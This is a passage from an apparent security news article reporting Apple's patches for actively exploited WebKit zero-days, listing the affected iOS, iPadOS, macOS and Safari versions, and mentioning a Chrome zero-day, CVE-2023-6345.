It's worth pointing out here that every third-party web browser that's available for iOS and iPadOS, including Google Chrome, Mozilla Firefox, and Microsoft Edge, and others, are powered by the WebKit rendering engine due to restrictions imposed by Apple, making it a lucrative and broad attack surface.

The updates are available for the following devices and operating systems -

*   **iOS 17.1.2 and iPadOS 17.1.2** - iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later
*   **macOS Sonoma 14.1.2** - Macs running macOS Sonoma
*   **Safari 17.1.2** - Macs running macOS Monterey and macOS Ventura

With the latest security fixes, Apple has remediated as many as 19 actively exploited zero-days since the start of 2023. It also comes days after Google shipped fixes for a high-severity flaw in Chrome (CVE-2023-6345) that has also come under real-world attacks, making it the seventh zero-day to be patched by the company this year.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#sap